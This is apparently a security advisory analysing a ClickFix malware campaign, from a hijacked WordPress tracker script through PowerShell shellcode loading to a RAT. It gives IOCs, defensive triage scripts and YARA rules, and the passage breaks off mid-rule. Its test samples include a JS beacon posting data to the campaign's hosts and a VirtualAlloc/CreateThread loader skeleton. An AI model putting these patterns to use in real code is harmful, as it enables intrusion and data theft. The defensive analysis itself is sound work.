Security Advisory · 2026-06-10

Omegatech EtherHiding
ClickFix V9

A V8 infrastructure rotation introducing separated beacon/payload stages, aged AWS domain abuse, and a C# P/Invoke stub identical to V8 at the source level — confirmed via PS process memory dump. Full compromise in 26 seconds from first browser contact.

Campaign infrastructure staged in a single overnight window (22 h 34 min between the two DNS changes), 25 days before detonation:
2026-05-15 03:40 UTC · ksrndkehqnwntyxlhgto.com · DNS changed · registered 2024-02-27
2026-05-16 02:14 UTC · process.iconnode.com · DNS changed · registered 2014-06-15 (aged)
2026-06-10 19:58 UTC · williamhale.co.uk · campaign live · ANY.RUN ea5e5bd2
⚠ Both AWS domains changed DNS within a day of each other: same operator, same prep window. iconnode.com was registered in 2014 and sat dormant for nearly 12 years before being weaponised; its high reputation score (95/100) was the entire point.
Key figures
26 s · time from first browser contact to active C2
~12 yr · age of process.iconnode.com at weaponisation (registered 2014)
1,254 · characters injected ahead of the legitimate tracker JS
2 · PowerShell process memory dumps confirming the out uint tid parameter (not sid)
2 · WhatConverts account pools observed (137116 and 123340)
Kill Chain
STAGE 0 T+0.00s  |  2026-06-10 19:58:12 UTC
Lure page — williamhale.co.uk
Compromised WordPress site · UK commercial CCTV & security business
Brotli-compressed HTML served via Cloudflare 141.193.213.11 (31 KB on the wire, 134 KB decompressed)
Injected script tag: <script src="//s.ksrndkehqnwntyxlhgto.com/137116.js" id="whatconverts-tracking-script-js">
dns-prefetch for ksrndkehqnwntyxlhgto.com injected in <head> to pre-warm resolver before script tag loads
CF challenge active at detonation (timestamp 1781121491 = 19:58:11 UTC)
Industry-aware injection: WhatConverts is a plausible lead-tracking tool for a UK CCTV/trades business
IOC SHA256: 0F34DB2432CAF35568AD5F415389FCC2871CEE3AE47A38CCBC1AC4B993006449 (f_0002a6 Edge cache entry)
STAGE 1 T+0.00–0.28s  |  TLS to AWS (18.245.60.9 + 13.248.238.122)
JS beacon — 137116.js
Hijacked WhatConverts tracker · 57,362 bytes · 1,254-char malicious prefix · NEW V9 ARCHITECTURE
POST //process.iconnode.com/google-ads/ — silent C2 liveness beacon. No body. HTTP 200 sets yrejzpicqjfxoquxuuaw=true (beacon-confirmed flag). NEW in V9 — not present in V1–V8.
POST //p.ksrndkehqnwntyxlhgto.com/verification/ — infection confirmation callback. Sends wc_profile_id=137116. Conditional on wc_verification cookie.
Dedup guards use random variable names: phbqslixugkynefhnzol (beacon-sent) and yrejzpicqjfxoquxuuaw (beacon-confirmed)
Remainder of file is legitimate WhatConverts account 137116 code — retained in full to avoid detection by site owner
Multiple victim pools confirmed: account 123340.js also observed on same infrastructure (separate lure site)
IOC SHA256: 86C9D146201932FEB8D6B42161938F1C145C8989E7C753AAC876704D365724E9 (137116.js · 57,362 bytes)
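The Stage 0 injection and the Stage 1 beacon prefix can both be triaged offline from a saved page and the fetched tracker. The script below is an added example written for this advisory, not SecureLeaf's or the page's own tooling. The sample HTML and JS are constructed from the indicators above (the injected tag, the two beacon URLs, the dedup guard names) and are not the captured files; the script-host allowlist, the 20-lowercase-letter identifier heuristic (every campaign-specific token on this page, the two guards and the CDN label, happens to be exactly 20 letters) and the list of network APIs are this example's assumptions.

```python
"""Triage a lure page and a suspected hijacked tracker (Stage 0/1).

Added example, not code from the advisory. Sample inputs are constructed
from the advisory's indicators; allowlist and heuristics are assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed: hosts this site is expected to load first-party scripts from.
ALLOWED_SCRIPT_HOSTS = {"williamhale.co.uk", "www.williamhale.co.uk"}

# Beacon/callback markers from the advisory's Stage 1 description.
BEACON_MARKERS = (
    "process.iconnode.com/google-ads/",
    "p.ksrndkehqnwntyxlhgto.com/verification/",
    "wc_profile_id",
)
# Heuristic (assumption): campaign tokens are exactly 20 lowercase letters.
RANDOM_IDENT = re.compile(r"\b[a-z]{20}\b")
# Assumed: browser APIs a silent POST beacon would use.
NET_APIS = ("fetch(", "XMLHttpRequest", "navigator.sendBeacon")


class ResourceCollector(HTMLParser):
    """Collects external <script src> tags and dns-prefetch hints."""

    def __init__(self):
        super().__init__()
        self.scripts = []    # (src, id)
        self.prefetch = []   # href of each <link rel="dns-prefetch">

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.scripts.append((a["src"], a.get("id") or ""))
        elif tag == "link" and (a.get("rel") or "").lower() == "dns-prefetch":
            self.prefetch.append(a.get("href") or "")


def host_of(url):
    """Hostname of an absolute or scheme-relative URL ('' for relative paths)."""
    return urlsplit(url if "//" in url else "//" + url).hostname or ""


def triage_html(html):
    """Flag off-site script tags, noting WordPress-style '<handle>-js' ids
    (wp_enqueue_script output) and whether the host was dns-prefetched."""
    c = ResourceCollector()
    c.feed(html)
    prefetch_hosts = [host_of(p) for p in c.prefetch]
    hits = []
    for src, sid in c.scripts:
        h = host_of(src)
        if h and h not in ALLOWED_SCRIPT_HOSTS:
            hits.append({
                "src": src, "id": sid, "host": h,
                "wp_handle_style": sid.endswith("-js"),
                "prefetched": any(h == p or h.endswith("." + p) for p in prefetch_hosts),
            })
    return hits


def triage_js(js):
    """Score the head of a tracker file for the V9 beacon prefix."""
    head = js[:4096]   # the malicious code is prepended, so scan the head only
    markers = [m for m in BEACON_MARKERS if m in head]
    idents = sorted(set(RANDOM_IDENT.findall(head)))
    net = [n for n in NET_APIS if n in head]
    # Offset where the last known marker ends: a lower bound on prefix length.
    prefix_end = max((head.find(m) + len(m) for m in markers), default=0)
    return {"markers": markers, "random_idents": idents, "net_apis": net,
            "prefix_end": prefix_end,
            "verdict": bool(markers) and bool(idents) and bool(net)}


# Constructed samples (indicators from the advisory, layout invented here).
SAMPLE_HTML = """<html><head>
<link rel="dns-prefetch" href="//ksrndkehqnwntyxlhgto.com">
<script src="//s.ksrndkehqnwntyxlhgto.com/137116.js" id="whatconverts-tracking-script-js"></script>
<script src="/wp-includes/js/jquery/jquery.min.js" id="jquery-core-js"></script>
</head><body></body></html>"""

SAMPLE_JS = (
    "var phbqslixugkynefhnzol=false,yrejzpicqjfxoquxuuaw=false;"
    "if(!phbqslixugkynefhnzol){phbqslixugkynefhnzol=true;"
    "fetch('//process.iconnode.com/google-ads/',{method:'POST'})"
    ".then(function(r){if(r.status==200){yrejzpicqjfxoquxuuaw=true;}});}"
    "if(document.cookie.indexOf('wc_verification')>-1){"
    "fetch('//p.ksrndkehqnwntyxlhgto.com/verification/',{method:'POST',"
    "body:'wc_profile_id=137116'});}"
    "/* ...legitimate WhatConverts account code would follow... */"
)

if __name__ == "__main__":
    for hit in triage_html(SAMPLE_HTML):
        print("suspicious script:", hit)
    print("tracker:", triage_js(SAMPLE_JS))
```

Run it against a saved copy of the lure page and the 137116.js body; on a real site, replace the allowlist with the hosts the site legitimately enqueues from, and treat a plugin-style id whose src points elsewhere as the primary signal, since the 20-letter heuristic is specific to this campaign's naming.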
STAGE 2 T+4.40s  |  1,124 pkts inbound · 1.26 MB
EtherHiding overlay — dntds.shop/teamrepo
BSC-backed encrypted payload · ClickFix CAPTCHA social engineering
TLS to 178.16.53.137:443 (dntds.shop · OMEGATECH-AS AS202412 · Seychelles BPH)
GET /teamrepo?rnd=<float> — cache-busting float param. Endpoint rotated from /jsrepo used in V7b. Same host, same ASN.
1,260,921 bytes returned encrypted — contains ClickFix overlay HTML + C# loader source code
Fake Cloudflare CAPTCHA overlay rendered in-page — instructs user to open Windows Terminal
PowerShell command written to clipboard via navigator.clipboard / execCommand copy — user-assisted execution bypasses traditional security controls
IOC dntds.shop → 178.16.53.137 (AS202412)  |  URL pattern: /teamrepo?rnd=
STAGE 3 T+22.28s  |  HTTP plaintext · 1,610 bytes recovered
PowerShell download cradle — 91.92.240.121
Full loader source recovered from PCAP + PS process memory dump · C# stub embedded inline
User pastes the clipboard command; Windows PowerShell 5.1 executes it (the cradle's HTTP request carries User-Agent WindowsPowerShell/5.1.19041.4046)
GET http://91.92.240.121/ — bare IP, no TLS. Server: Apache/2.4.66 (Debian) · OMEGATECH-AS · Spamhaus DROP groups 14 + 31
Response: PS script with C# stub class xlsZNpdJdwlmMh embedded as here-string. ALSO recovered from PS process memory dump at offset 0x006c7975
Variable map: $ydPyHgCTOK=URL · $qubnxYmvaK=WebRequest · $cdtctMBntzxi=raw_bytes · $RldCBOBdan=length · $kLUaYgtCb=alloc_ptr · $uiNEvuLJdSskH=thread_handle · $fqriSDP=thread_id
VirtualAlloc flags: 0x1000 | 0x2000 = 0x3000 (MEM_COMMIT | MEM_RESERVE) · Protection: 0x40 = PAGE_EXECUTE_READWRITE
WaitForSingleObject timeout: 30,000 ms (30 seconds)
csc.exe compile flags recovered from memory: /debug- /optimize+ /warnaserror /optimize+ (double /optimize+ is a notable quirk)
IOC 91.92.240.121:80 · Apache/2.4.66 Debian · Spamhaus DROP groups 14 + 31 · AS202412
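The recovered loader can be fingerprinted statically from the properties listed above (abbreviated P/Invoke parameter names, VirtualAlloc with 0x3000/0x40, a 30-second WaitForSingleObject) without ever executing it. The following is an added example, not the advisory's or SecureLeaf's tooling, that generalises the YARA rule's string match into a parser that reports each import's parameter names and decodes the allocation constants. SAMPLE_LOADER is a constructed skeleton assembled only from the signatures, variable names and constants the advisory lists; it is not the recovered 1,610-byte script and contains no download or execution logic.

```python
"""Fingerprint a recovered PowerShell/C# P/Invoke loader (Stage 3) statically.

Added example, not the advisory's tooling. SAMPLE_LOADER is a constructed
skeleton of declarations and call shapes from the advisory, not the real file.
"""
import re

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x100000: "MEM_TOP_DOWN"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# [DllImport("x.dll")] ... static extern <ret> <Name>(<params>)
DLLIMPORT = re.compile(
    r'\[DllImport\("([^"]+)"[^\]]*\]\s*(?:public\s+)?static\s+extern\s+'
    r'(\w+)\s+(\w+)\s*\(([^)]*)\)', re.S)
# One parameter: optional out/ref modifier, type, name.
PARAM = re.compile(r'(?:(out|ref)\s+)?([\w\.]+)\s+(\w+)')
# VirtualAlloc call whose flag and protection arguments are literals.
VALLOC_CALL = re.compile(
    r'VirtualAlloc\(\s*[^,]+,\s*[^,]+,\s*(0x[0-9a-fA-F]+|\d+)\s*,\s*(0x[0-9a-fA-F]+|\d+)\s*\)')
WFSO_CALL = re.compile(r'WaitForSingleObject\([^,]+,\s*(\d+)\s*\)')


def decode_flags(value, table):
    """Expand a bitmask into constant names, keeping any unknown remainder."""
    names = [n for bit, n in table.items() if value & bit]
    leftover = value & ~sum(table)
    return names + ([f"0x{leftover:x}"] if leftover else [])


def parse_pinvoke(text):
    """Each P/Invoke import with its parameters; 'abbreviated' is true when
    every name is at most three letters (a, sz, t, p, ta, ss, sa, cf, h, ms, tid)."""
    imports = []
    for dll, ret, name, params in DLLIMPORT.findall(text):
        plist = [(mod or "", typ, pname) for mod, typ, pname in PARAM.findall(params)]
        imports.append({
            "dll": dll.lower(), "name": name, "ret": ret, "params": plist,
            "abbreviated": all(len(p[2]) <= 3 for p in plist),
            "out_params": [p[2] for p in plist if p[0] == "out"],
        })
    return imports


def fingerprint(text):
    """Summarise P/Invoke fingerprint, allocation flags/protection and timeout."""
    imports = parse_pinvoke(text)
    names = {i["name"] for i in imports}
    result = {
        "imports": imports,
        "has_alloc_thread_wait": {"VirtualAlloc", "CreateThread", "WaitForSingleObject"} <= names,
        "all_abbreviated": bool(imports) and all(i["abbreviated"] for i in imports),
        "rwx_alloc": False, "alloc_flags": [], "protection": [], "wait_ms": None,
    }
    m = VALLOC_CALL.search(text)
    if m:
        flags, prot = int(m.group(1), 0), int(m.group(2), 0)
        result["alloc_flags"] = decode_flags(flags, MEM_FLAGS)
        result["protection"] = decode_flags(prot, PAGE_PROT)
        result["rwx_alloc"] = prot == 0x40
    w = WFSO_CALL.search(text)
    if w:
        result["wait_ms"] = int(w.group(1))
    return result


# Constructed skeleton: declarations and call shape only, no payload handling.
SAMPLE_LOADER = r'''
$src = @"
using System; using System.Runtime.InteropServices;
public class xlsZNpdJdwlmMh {
  [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr a, uint sz, uint t, uint p);
  [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf, out uint tid);
  [DllImport("kernel32.dll")] public static extern uint WaitForSingleObject(IntPtr h, uint ms);
}
"@
$kLUaYgtCb = [xlsZNpdJdwlmMh]::VirtualAlloc([IntPtr]::Zero, $RldCBOBdan, 0x3000, 0x40)
$uiNEvuLJdSskH = [xlsZNpdJdwlmMh]::CreateThread([IntPtr]::Zero, 0, $kLUaYgtCb, [IntPtr]::Zero, 0, [ref]$fqriSDP)
[xlsZNpdJdwlmMh]::WaitForSingleObject($uiNEvuLJdSskH, 30000)
'''

if __name__ == "__main__":
    import json
    print(json.dumps(fingerprint(SAMPLE_LOADER), indent=1))
```

Because the parser keys on the declaration shape rather than exact whitespace, it survives the re-spacing and renaming that would defeat the literal YARA strings; the class name and variable names are irrelevant to the verdict, which is exactly the property the advisory attributes to the Tier-1 developer's habit.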
STAGE 4 T+23.97s  |  HTTP plaintext · both binaries confirmed
Payload fetch — 158.94.208.104/x7GkP2mQ9zL4/
Two binaries · path unchanged from V8 · MZER PE + Donut shellcode confirmed via PCAP
GET /x7GkP2mQ9zL4/student_l.bin → 53,323 bytes · First bytes: e8 c0 6d 00 (x86 CALL, no MZ header) = raw Donut shellcode. UA: WindowsPowerShell/5.1.19041.4046
GET /x7GkP2mQ9zL4/student_s.bin → 308,736 bytes · Magic: 4d 5a 45 52 (MZ+ER) = MZER loader PE, matches V8 memdumps. UA: powershell (bare — different caller)
Label inversion (PCAP-confirmed): _l = small Donut blob (53 KB) · _s = large MZER PE (309 KB). Inverted from intuition — ANY.RUN labels were misleading.
UA divergence reveals two-stage fetch: PS cradle retrieves _l directly; Donut shellcode independently fetches _s with a different UA string
Both files: Server: Apache/2.4.52 (Ubuntu) · Last-Modified: 2026-06-03 · path prefix /x7GkP2mQ9zL4/ unchanged from V8
IOC http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin  +  student_s.bin · AS202412
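The label inversion above was settled by looking at the first bytes of each download and, for the PE, at its header. The following is an added example, not the advisory's or SecureLeaf's tooling, that does that classification mechanically and also extracts the header fields the memory-carving section cites (machine 0x014c, section count, .text size, entry-point RVA). The PE input is a hand-built minimal PE32 header with no code; its section names and the MZER tag are chosen to mirror the properties reported for zgxr4teh.dll and are not the real file. The shellcode input is the observed 4-byte prefix e8 c0 6d 00 padded with zeros; the fourth byte of the rel32 operand was not captured, so the computed call target is illustrative only.

```python
"""Classify recovered payload blobs: raw x86 shellcode vs (MZER-tagged) PE.

Added example, not the advisory's tooling. Both samples are constructed.
"""
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C


def parse_pe(blob):
    """Machine, section table and entry-point RVA, or None if not MZ/PE."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic, = struct.unpack_from("<H", blob, opt)
    ep_rva, = struct.unpack_from("<I", blob, opt + 16)   # AddressOfEntryPoint
    sections, sec = [], opt + opt_size
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", blob, sec + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "raw_size": rawsize, "raw_ptr": rawptr})
    # Bytes 2-3 are e_cblp in the DOS header; the loader ignores them, which
    # is why an 'ER' tag there does not stop the file from loading.
    return {"machine": machine, "pe32": magic == 0x10B, "sections": sections,
            "ep_rva": ep_rva, "dos_tag": blob[2:4]}


def classify(blob):
    """Decide what a blob is from its leading bytes, as the PCAP analysis did."""
    pe = parse_pe(blob)
    if pe:
        return ("pe_mzer" if pe["dos_tag"] == b"ER" else "pe"), pe
    if blob[:1] == b"\xe8" and len(blob) >= 5:          # x86 CALL rel32
        rel32 = struct.unpack_from("<i", blob, 1)[0]
        return "shellcode", {"first_insn": "call rel32", "rel32": rel32,
                             "call_target": 5 + rel32}
    return "unknown", {}


def count_pattern(mem, pattern):
    """Non-overlapping hits of a byte pattern in a memory dump."""
    return mem.count(pattern)


def build_minimal_pe(tag=b"ER", ep_rva=0x246E, text_size=1140, nsections=3):
    """Hand-build a PE32 x86 header + section table (assumed section names)."""
    e_lfanew = 0x40
    dos = b"MZ" + tag + b"\0" * (0x3C - 4) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                                   # standard PE32 optional header
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, nsections, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic
    struct.pack_into("<I", opt, 16, ep_rva)           # AddressOfEntryPoint
    names = [b".text", b".rsrc", b".reloc"][:nsections]
    sizes = [text_size, 0x200, 0x100]
    secs = b""
    for i, n in enumerate(names):
        secs += struct.pack("<8sIIII", n.ljust(8, b"\0"), sizes[i], 0x1000 * (i + 1), sizes[i], 0x400 * (i + 1))
        secs += b"\0" * 16                            # remaining section header fields
    return dos + b"PE\0\0" + coff + bytes(opt) + secs


# Constructed samples.
SAMPLE_SHELLCODE = b"\xe8\xc0\x6d\x00\x00" + b"\x00" * 11   # observed prefix, zero padded
SAMPLE_MZER = build_minimal_pe()

if __name__ == "__main__":
    print(classify(SAMPLE_SHELLCODE))
    kind, info = classify(SAMPLE_MZER)
    print(kind, hex(info["machine"]), hex(info["ep_rva"]), [s["name"] for s in info["sections"]])
    print("call-pattern hits:", count_pattern(SAMPLE_SHELLCODE * 3, b"\xe8\xc0\x6d\x00"))
```

Point classify() at student_l.bin and student_s.bin as carved from the PCAP to reproduce the inversion finding, and run count_pattern() over the two process dumps to reproduce the 5-hit and 8-hit counts; on a real carved image, remember that raw_size and the on-disk hash describe the file form, while a dump reflects the mapped, relocated image, which is why the two hashes for zgxr4teh.dll differ.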
STAGE 5 T+~25s  |  In-memory · YARA confirmed
In-memory shellcode injection — powershell.exe → svchost CDPUserSvc
csc.exe compiles C# stub · VirtualAlloc RWX · Donut loads MZER PE · svchost injected
Add-Type compiles class xlsZNpdJdwlmMh into zgxr4teh.dll, written to %TEMP% by csc.exe + cvtres.exe (the standard Add-Type toolchain)
VirtualAlloc(IntPtr.Zero, size, 0x3000, 0x40) → RWX page in powershell.exe · Marshal.Copy writes Donut blob
CreateThread → Donut executes, reflectively loads MZER PE → injects into svchost.exe CDPUserSvc (PID 4456)
YARA detections: DONUTLOADER (powershell.exe) · GENERIC (powershell + svchost)
Tier-1 dev fingerprint: abbreviated P/Invoke params (a, sz, t, p, ta, ss, sa, cf, h, ms) identical to V8 flferzre stub. Memory dump confirms out uint tid — same as V8. No out-param mutation.
zgxr4teh.dll carved from PS process memory dump (offset 0x00953fc0): PE32 x86 (0x014c) · 3 sections · .text only 1,140 bytes (minimal stub, zero padding) · EP RVA 0x246e · memory hash differs from on-disk (relocation applied at load)
Donut CALL pattern e8 c0 6d 00 resident in PS process memory: 5 hits (dump1) → 8 hits (dump2) — shellcode was actively executing between the two snapshots
IOC zgxr4teh.dll on-disk SHA256: FEF8F43BF82BAA199C6C2AC67C50103CF66D4524B24F6D96833CFD5794C99244 · mem-carved SHA256: 6D02D3AB470C5114BF8FDA6FC30CD179BA4FCE5876B0EBC9B92852BF979F4AD2
STAGE 6 T+25.97s  |  :3038 binary protocol
RAT C2 established — 91.92.243.161:3038
svchost CDPUserSvc beacons to OMEGATECH-AS · MSIL/Generic RAT · length-prefixed binary protocol
svchost.exe (PID 4456) connects to 91.92.243.161:3038 · OMEGATECH-AS AS202412 · Seychelles BPH
Binary handshake: client frame prefixed 0x40 0x01 0x00 0x00 (little-endian 0x140 = 320; 328 bytes observed), server frame prefixed 0x20 0x01 0x00 0x00 (0x120 = 288; 292 bytes observed, i.e. 4-byte prefix + 288-byte body). Length-prefixed protocol; the server frame matches the prefix exactly, the client frame is 4 bytes longer than prefix + body, which the capture does not explain.
Detections: MSIL/Generic RAT + Win32/Generic Agent C2. The MSIL classification points to a .NET implant; that does not fit Cobalt Strike Beacon (native code) or Sliver (Go), so no framework is attributed on this evidence.
Spamhaus DROP listed: group 14 (same list as 91.92.240.121 stage-3 host)
Time from first browser contact to active C2: 25.97 seconds
IOC 91.92.243.161:3038 · OMEGATECH-AS202412 · Spamhaus DROP group 14
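A detection for this C2 needs to reassemble frames from a TCP stream before it can look at the prefixes, and frames will routinely straddle segment boundaries. The block below is an added example, not the advisory's or SecureLeaf's tooling. The framing rule it implements (a little-endian uint32 body length followed by the body) is an assumption that fits the observed server message (0x120 = 288 = 292 - 4) but not the extra 4 bytes on the client message; the frame bodies are constructed filler of the observed lengths, not captured traffic.

```python
"""Reassemble a length-prefixed C2 stream and match the V9 handshake prefixes.

Added example, not the advisory's tooling. Framing rule and sample bodies
are assumptions; the client frame's extra 4 observed bytes are not modelled.
"""
import struct

HEADER_LEN = 4
MAX_BODY = 1 << 20   # assumed sanity bound: larger prefixes are not frames


class Framer:
    """Incremental reassembler: feed TCP payload in arrival order, receive
    complete frame bodies; a partial frame is held until the rest arrives."""

    def __init__(self):
        self.buf = bytearray()

    def feed(self, chunk):
        self.buf += chunk
        frames = []
        while len(self.buf) >= HEADER_LEN:
            body_len = struct.unpack_from("<I", self.buf, 0)[0]
            if body_len > MAX_BODY:
                raise ValueError(f"implausible length prefix 0x{body_len:x}")
            if len(self.buf) < HEADER_LEN + body_len:
                break                                   # wait for more data
            frames.append(bytes(self.buf[HEADER_LEN:HEADER_LEN + body_len]))
            del self.buf[:HEADER_LEN + body_len]
        return frames

    def pending(self):
        """Bytes buffered for an incomplete frame."""
        return len(self.buf)


def handshake_looks_like_v9(client_prefix, server_prefix):
    """True when the first client/server prefixes are the observed 0x140/0x120."""
    c = struct.unpack("<I", client_prefix)[0]
    s = struct.unpack("<I", server_prefix)[0]
    return (c, s) == (0x140, 0x120)


def frame(body):
    """Encode a body under the assumed framing rule."""
    return struct.pack("<I", len(body)) + body


# Constructed exchange: filler bodies of the observed lengths.
CLIENT_HELLO = frame(b"C" * 0x140)   # prefix 40 01 00 00
SERVER_HELLO = frame(b"S" * 0x120)   # prefix 20 01 00 00, 292 bytes total

if __name__ == "__main__":
    f = Framer()
    # Deliver the server reply in two segments to exercise reassembly.
    first = f.feed(SERVER_HELLO[:100])
    second = f.feed(SERVER_HELLO[100:])
    print(len(first), "frames after segment 1;", len(second), "after segment 2;",
          "body", len(second[0]) if second else None, "bytes")
    print("V9 handshake:", handshake_looks_like_v9(CLIENT_HELLO[:4], SERVER_HELLO[:4]))
```

For a network sensor the same logic belongs in a stream-aware signature (prefix match on the first bytes of each direction of the flow) rather than a packet match, precisely because the 292-byte reply need not arrive in one segment.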
Infrastructure Staging

⚠ Aged Domain Abuse: asset dormant for nearly 12 years weaponised

process.iconnode.com was registered on 2014-06-15 and sat dormant for nearly 12 years before its DNS was updated on 2026-05-16 at 02:14 UTC, 22 hours 34 minutes after ksrndkehqnwntyxlhgto.com was updated on 2026-05-15 at 03:40 UTC. The coordinated overnight prep window, combined with an aged domain carrying a 95/100 reputation score, is textbook aged domain abuse: the threat actor acquired or maintained the domain specifically to weaponise its trust score at campaign launch, so reputation-based blocklists never fire on it.

process.iconnode.com
Registered: 2014-06-15 09:44 UTC
Last DNS change: 2026-05-16 02:14 UTC
BGP origin: 54.208.0.0/15 · AS14618
Registrar/host: Amazon AWS (both)
Role: V9 C2 beacon · /google-ads/ silent POST
Dormant nearly 12 years, then weaponised. Reputation score 95/100 at detonation. New IOC, not in V1–V8.
ksrndkehqnwntyxlhgto.com
Registered: 2024-02-27 11:43 UTC
Last DNS change: 2026-05-15 03:40 UTC
BGP origin: 54.208.0.0/15 · AS14618
Registrar/host: Amazon Registrar + AWS
Role: CDN (s.) serving the hijacked JS · exfil/verification beacon endpoint (p.)
DNS changed 22 h 34 min before iconnode.com. Same operator, same prep window. AWS abuse reported 2026-06-10.
V8 vs V9 — Key Evolutions
Change | V8 | V9
Stage architecture | Single injected script: beacon + overlay combined | Separated: JS beacon stage distinct from EtherHiding payload delivery (NEW)
C2 beacon | None: no pre-delivery beacon in V1–V8 | process.iconnode.com/google-ads/ · silent POST · AWS aged domain (NEW)
EtherHiding endpoint | dntds.shop/jsrepo | dntds.shop/teamrepo · same host, rotated path
Lure site | penrosept.com (physio clinic) | williamhale.co.uk (CCTV business)
Tracker cover | Generic plugin injection | WhatConverts account 137116 cloned + re-hosted on AWS CDN · 95/100 reputation
Multiple pools | Single lure per campaign | Accounts 137116 + 123340 both observed: parallel victim pools (NEW)
Payload naming | V8 convention | student_l.bin (Donut 53 KB) + student_s.bin (MZER PE 309 KB) · labels inverted from intuition
C# stub out param | out uint tid | out uint tid: IDENTICAL, memory dump confirmed, no out-param mutation in V9 (CORRECTED)
Staging server | 158.94.208.104 / /x7GkP2mQ9zL4/ | 158.94.208.104 / /x7GkP2mQ9zL4/ · unchanged
Tier-1 dev fingerprint | Abbreviated P/Invoke params (a, sz, t, p…) | Identical · same developer confirmed
Key Forensic Findings — PCAP ea5e5bd2
LOADER SOURCE RECOVERED
Full 1,610-byte PowerShell stage-2 loader recovered from two independent sources: PCAP plaintext (HTTP from 91.92.240.121:80) and PS process memory dump (offset 0x006c7975). Full variable map recovered: $ydPyHgCTOK (URL) · $qubnxYmvaK (WebRequest) · $cdtctMBntzxi (bytes) · $kLUaYgtCb (alloc ptr) · $uiNEvuLJdSskH (thread handle). Confirms VirtualAlloc(0x3000, 0x40=RWX), CreateThread, WaitForSingleObject(30s). csc.exe compile flags: /debug- /optimize+ /warnaserror /optimize+. Loader hashes: MD5 A18E3B928BBC92FC72090F1313944026 · SHA256 FFE7EEEF…FD21A56.
PAYLOAD LABEL INVERSION
ANY.RUN size labels were inverted. PCAP confirms: student_l.bin = 53,323 bytes (raw x86 shellcode, first bytes e8 c0 6d 00 = CALL, no MZ header) · student_s.bin = 308,736 bytes (MZER PE, magic 4d 5a 45 52). _l = Donut blob, _s = shellcode-carrying PE. STIX bundle corrected accordingly.
MZER MAGIC CONFIRMED
student_s.bin magic bytes 4d 5a 45 52 (MZ+ER) match the MZER loader signature identified in V8 memdump analysis. The 'ER' occupies the DOS header's e_cblp field (offset 2), which the Windows PE loader ignores (only e_magic and e_lfanew are consulted), so the tagged file still loads normally: it is a developer marker, not a format change. Same Tier-1 developer payload format reused across V8 and V9.
DUAL UA TELLS
student_l.bin fetched with UA WindowsPowerShell/5.1.19041.4046 (PS cradle). student_s.bin fetched with bare UA powershell — different process reaching back to staging server, confirming the Donut shellcode independently fetches the MZER PE.
C2 HANDSHAKE
RAT handshake at 91.92.243.161:3038: client sends a frame prefixed 40 01 00 00 (little-endian 0x140 = 320; 328 bytes observed), server responds prefixed 20 01 00 00 (0x120 = 288; 292 bytes observed = 4-byte prefix + 288-byte body). Length-prefixed binary protocol. MSIL classification suggests a .NET implant; it is inconsistent with a Cobalt Strike Beacon (native code) or Sliver (Go) implant, so the RAT family remains unattributed pending sample analysis.
MEM DUMP — tid CONFIRMED
Both PS process memory dumps confirm out uint tid (4 hits each) — no out-param mutation between V8 and V9. The earlier tid→sid notation was incorrect and has been retracted. V8 and V9 stubs are source-identical at the P/Invoke level. YARA rule catches both on abbreviated param style alone; no condition adjustment needed.
PE CARVED FROM RAM
zgxr4teh.dll carved from process memory at offset 0x00953fc0 (dump-6a29c211). PE32 x86 · 3 sections · .text = 1,140 bytes (minimal stub, zero junk) · EP RVA 0x246e. Memory hash (6D02D3AB…) differs from on-disk (FEF8F43B…) due to relocation — both documented. Donut CALL bytes e8 c0 6d 00: 5 hits in dump1, 8 hits in dump2 — shellcode actively executing between snapshots.
26-SECOND CHAIN
Full attack chain from first browser contact (T+0.00s) to active RAT C2 (T+25.97s) completes in under 26 seconds. No persistence mechanism observed within 60-second sandbox window — RAT likely handles persistence post-check-in.
YARA Detection Rules
SecureLeaf_Omegatech_CSharp_PInvoke_Loader_V8V9

Matches the abbreviated P/Invoke parameter style that is the Tier-1 developer's coding fingerprint across V8 and V9. Process memory dump confirms both stubs use out uint tid — no out-param mutation between versions. Rule catches both on the abbreviation style alone.

rule SecureLeaf_Omegatech_CSharp_PInvoke_Loader_V8V9 {
    meta:
        description = "Omegatech ClickFix C# loader V8+V9 - Tier-1 dev fingerprint"
        author      = "SecureLeaf / Dispensight"
        date        = "2026-06-10"
        reference   = "SL-ADV-2026-WP-001-V9"
    strings:
        $valloc  = "VirtualAlloc(IntPtr a, uint sz, uint t, uint p)" ascii
        $cthread = "CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf" ascii
        $wfso    = "WaitForSingleObject(IntPtr h, uint ms)" ascii
        $interop = "System.Runtime.InteropServices" ascii
        $kernel  = "kernel32.dll" ascii
    condition:
        $interop and $kernel and $valloc and $cthread and $wfso
}
SecureLeaf_Omegatech_V9_JS_Beacon

Detects the injected malicious prefix in hijacked WhatConverts or similar analytics scripts. The two random-named dedup guards (phbqslixugkynefhnzol, yrejzpicqjfxoquxuuaw) are unique to this campaign and extremely unlikely to appear in legitimate code.

rule SecureLeaf_Omegatech_V9_JS_Beacon {
    meta:
        description = "Omegatech V9 injected JS beacon prefix in hijacked tracker"
        author      = "SecureLeaf / Dispensight"
        date        = "2026-06-10"
